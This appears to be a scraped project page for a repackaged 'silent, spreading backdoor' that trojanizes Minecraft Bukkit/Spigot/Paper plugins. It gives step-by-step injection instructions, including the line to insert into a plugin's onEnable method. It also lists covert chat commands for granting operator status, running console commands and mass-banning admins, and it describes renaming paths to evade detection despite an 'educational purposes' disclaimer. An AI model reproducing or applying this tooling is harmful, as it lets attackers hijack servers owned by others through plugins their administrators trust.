A silent, spreading backdoor for Minecraft Bukkit/Spigot/Paper servers

Overview

Thicc Industries' Minecraft Backdoor - REMSATERED

A silent, spreading backdoor for Minecraft Bukkit/Spigot/Paper servers. Using the injector is recommended, should you choose to manually backdoor a plugin, you're on your own if you run into problems.

For educational purposes only. Do not use on a server you do not own.

Backstory

I changed parts of this sofware because it was easy to detect you could look for the path com.thiccindustries.debugger and you would find files like Injector that normal plugins dont have so i have renamed some of the files and the paths to make it less likly that someone will find it. This software completely belongs to them and i am not saying i made this because i didnt i renamed some files and the paths.

Requirements:

Injector:

  • Java 8 runtime.
  • Desired target plugin jar file.
  • Your Minecraft UUID. (You can find your UUID at: NameMC)

Manual Injection:

  • Java 8 JDK.
  • Desired plugin source code.
  • Plugin dependencies.
  • Your Minecraft UUID. (You can find your UUID at: NameMC)

Usage instructions:

Injector:

  • Run backdoor-(version).jar.
  • Select desired plugin file.
  • Input your Minecraft UUID.
  • Input chat command prefix. (Default: #)

Manual Injection:

  • Download source code for desired plugin, and open in editor of your choice.
  • Merge com.thiccindustries.debugger folder into the plugin's source.
  • Open the Plugin's main source file, The file's class definition should look like this: public class Something extends JavaPlugin{}
  • Add the following line to the top of the file: import com.thiccindustries.debugger
  • Find the @Override public void onEnable(){} method.
  • Add the following line to the beginning of the method: new Backdoor(this, new String[]{"[Your UUID Here]"}, [Your Chat Prefix Here]);

Note: Add multiple UUIDs by separating multiple "[uuid]" entries by commas.

  • Change other configuration options in Config.java as desired.
  • Compile plugin.

Commands

Default command prefix is #, this can be changed.

  • #op - Give player operator status
  • #deop - Remove player's operator status
  • #ban - Ban player
  • #banip - IP ban player
  • #gamemode / gm - Change gamemode
  • #give - Give items
  • #32k - Enchant item in hand with level 32k enchants.
  • #exec - Execute a command as the server console. [Visible]
  • #chaos - Deop and Ban all ops currently online. Give admin to everyone else. [Visible]
  • #seed - Find world seed
  • #coords - Find player coordinates
  • #tp - Teleport to coordinates [Visible, See below.]
  • #auth - authorize new user
  • #deauth - deauthorize user
  • #help - List all available commands, with syntax and description.

Commands listed as [Visible] will be noticeable in Server console and or in-game chat.

Warning: Teleporting may cause a '[player name] moved to quickly!' warning in server console. It may also cause anti-cheat to kick you. Other strange behavior may occur when teleporting extreme distances. (such as to the world border)

License

This software is provided under the GPL3 License.

Credit to Rikonardo for his Bukloit project, which helped in the development of the Injector.

You might also like...

PluginHooker is a Bukkit plugin that aims to provide an ultimately simple and better method to hook Bukkit events.

PluginHooker PluginHooker is a Bukkit plugin that aims to provide an ultimately simple and better method to hook Bukkit events. Localization 简体中文 Feat

Nov 23, 2022

This is a plugin for Minecraft Server (Spigot API) introduces a sector system which connects a single world across multiple servers.

OpenSourceSectors 😎 🗒️ This is a plugin for Minecraft Server (Spigot API) introduces a sector system which connects a single world across multiple s

Dec 28, 2022

A network core plugin for the Spigot which best Experience for Minecraft Servers.

tCore The core plugin for Spigot. (Supports 1.8.8=) 大規模サーバー、ネットワーク等の中核となるプラグインです。プロトコルバージョン 1.8 未満での動作は確認していません。かなりの量のソースになりますが、様々な機能が実装されています。中身自体は過

Oct 13, 2022

Prism (Refracted) is a change-tracking plugin for Bukkit-based servers

Prism (Refracted) is a change-tracking plugin for Bukkit-based servers. Supports rollbacks, restores, previews, wands, and so much more. Tracking so good, the NSA stole our name.

Dec 30, 2022

A Mixin framework for Spigot/Bukkit that allows you to hook custom event anywhere

A Mixin framework for Spigot/Bukkit that allows you to hook custom event anywhere

A Mixin framework for Spigot/Bukkit that allows you to hook custom event anywhere. Start coding your advanced plugins today!

Nov 30, 2022

A bukkit/spigot plugin to add custom music discs using the Simple Voice Chat API.

Custom Discs 1.19 A spigot/bukkit fork of henkelmax's Audio Player. Play custom music discs using the Simple Voice Chat API. (The voice chat mod is re

Dec 22, 2022

A minecraft shop plugin for 1.17.1 paper.

shop-plugin Support server A minecraft shop plugin for 1.17.1 paper. Notes: NMS not required please dont copy the code, download the jar from releases

Sep 7, 2022

A Minecraft Paper Plugin for 1.18.2

A Minecraft Paper Plugin for 1.18.2

Dec 23, 2022

A small Reactive API with RxJava for Minecraft Paper Plugins.

RxPaper A small Reactive API with RxJava for Minecraft Paper Plugins. Usage RxPaper.io() When you want to return something back in the Minecraft Threa

Dec 9, 2021

The best plugin to protect anarchy servers and mc servers in general against op attacks.

AdminSecure The best plugin to protect anarchy servers and mc servers in general against op attacks How does it work? When the server detects a player

Sep 2, 2021

Integration Test Framework for Paper!

MiniTestFramework Integration Test Framework for Paper! Usage Install plugin Create Test Structure /test create filename.testname [width] Build cont

Nov 25, 2022

Java implementation of our paper: Efficient Private Set Intersection Cardinality inthe Reverse Unbalanced Setting Utilizing Hash-Prefix Filter

PSI-CA-Framework This is the Java implementation of our paper: Efficient Private Set Intersection Cardinality inthe Reverse Unbalanced Setting Utilizi

Dec 30, 2022

A simple paper plugin which allows deepslate to be instamined

InstantDeepslate An extremely simple plugin that allows you to instantly mine deepslate. I used the paperweight test plugin as the base for this plugi

Jan 31, 2022

Simple Rock Paper Scissors game

Simple Rock Paper Scissors game

Java game Rock Paper Scissors Simple game where you play rock paper scissors against bot. Made for learning purposes. That include some of cool featur

Mar 6, 2022

Rock, paper, scissors- shoot!, in 10 programming languages

Rock Paper Scissors In 10 Programming Languages The classic "rock, paper, scissors- shoot!" game, implemented in 10 programming languages Language Lin

Oct 8, 2022

LoliServer 是 Minecraft 较新版本 1.16.5 中的 Forge + Bukkit 服务端核心, 支持Forge Mod和Bukkit 插件, 兼容性与性能优秀, 于Mohist1.16.5基础加以维护更新

LoliServer 1.16.5 LoliServer-1.16.5,基于Forge并融合Paper/Spigot/Bukkit的高性能高兼容性的服务端核心 上游项目 Mohist Bukkit Paper CraftBukkit Spigot MinecraftForge Atom Thermo

Apr 29, 2022

Bukkit/Bungee plugin to send Minecraft data to JMX

Bukkit/Bungee plugin to send Minecraft data to JMX

Jan 30, 2022

Fast Bukkit Custom Book Constructor for Minecraft 1.8 to 1.16.5

BookMaker 📚 BookMaker is a fast Spigot API to create Custom Book for Minecraft 1.8 to 1.16.5. Features Create a book with your title, author and desc

Oct 2, 2021

Bukkit transaction API for predicting when a server packet arrives at a client. Mainly intended for use in Minecraft anticheats.

Pledge A high performance and lightweight Bukkit packet tracking API for predicting when a server packet arrives at a client using transactions. Mainl

Dec 1, 2022
Comments
  • It doesn't work Pls help

    It doesn't work Pls help

    Please do not suggest features here. Besides occasional bugfixes, this is a finished project.

    Describe the bug
    A clear and concise description of what the problem is.


    To Reproduce
    Steps to reproduce the behavior:

    1. Inject into [Plugin] for Minecraft [Version]
    2. Run [Command]
    3. See error


    Expected behavior
    A clear and concise description of what you expected to happen.


    Desktop (please complete the following information):

    • OS: [e.g. Windows, Linux]
    • Java Version: [Find using java -version in cmd / terminal]


    Server Console Log
    Please add relevant sections of server log here. If the log is too large, please use pastebin.

    Ignoring this template may result in a closed ticket, passive aggressiveness, or both.

    When I load up the server and the plugin is installed on the server I die #op or the other commands but nothing works can somebody help?

    opened by miningchicken 0
Releases(V2.2)
Owner
INZO_Technologies
INZO_Technologies
Backdoor injector for Bukkit/Spigot plugins.

MinePatcher Backdoor injector for Bukkit/Spigot plugins. MinePatcher was developed to test the security systems of Minecraft servers. Usage: 1. Window

null 3 Sep 18, 2022
💜 LiteSkullAPI Fast and extensive skull library for Bukkit/Spigot/Paper plugins

?? LiteSkullAPI Fast and extensive skull library for Bukkit/Spigot/Paper plugins. Helpful links: Support Discord GitHub issues Eternal Repository (Mav

Norbert Dejlich 16 Dec 2, 2022
This is plugin for 1.17 Spigot/Bukkit Minecraft's servers.

This is plugin for 1.17 Spigot/Bukkit Minecraft's servers. This plugin fixes BowExploit(BowBomb) that found recently. Meteor Client developers released their fix, but the problem is that it fixes vanills arrow mechanics. Together I with https://github.com/l1tecorejz we made a plugin that fixes the exploit and doesn't

CRystalCLient 10 Jan 3, 2023
An advanced 1.8.8 spigot backdoor.

CelestialBackdoor An advanced 1.8.8 spigot backdoor. This backdoor contains a plethora of commands to execute. This backdoor supports commands for Dis

CustomPayload 2 Jan 19, 2022
Paper-nms-maven-plugin - A maven plugin for using NMS on paper with Mojang mappings.

paper-nms-maven-plugin A maven plugin for using NMS on paper with Mojang mappings. This plugin will both create the mapped paper dependency and instal

null 56 Dec 28, 2022
DonationExecutor - плагин для Minecraft (Spigot/Paper)

DonationExecutor - плагин для Minecraft (Spigot/Paper) Плагин, который, получая информацию о новых донатах с Donation Alerts, автоматически генерирует

null 214 Dec 27, 2022
Android PackageInstaller API silent update test app

Android PackageInstaller API silent update test app

南宫雪珊 45 Dec 13, 2022
🏃 A lightweight, multiarena, complex Parkour Spigot/Bukkit plugin for Minecraft Server

?? A lightweight, multiarena, multilanguage, completely configurable and complex Parkour Spigot/Bukkit plugin for Minecraft Server

Victor Rodrigues 6 Oct 17, 2022
Minecraft Forge Hybrid server implementing the Spigot/Bukkit API (Cauldron for 1.18)

❓ About Magma is the next generation of hybrid minecraft server softwares. Magma is based on Forge and Paper, meaning it can run both Craftbukkit/Spig

Magma Foundation 12 Apr 18, 2022
r/place replica in Minecraft (Bukkit/Spigot plugin)

MinePlace offers a completely new gaming experience in Minecraft. As a parody of r/place, a world-renowned reddit community project, this project offe

Northernside 4 Aug 19, 2022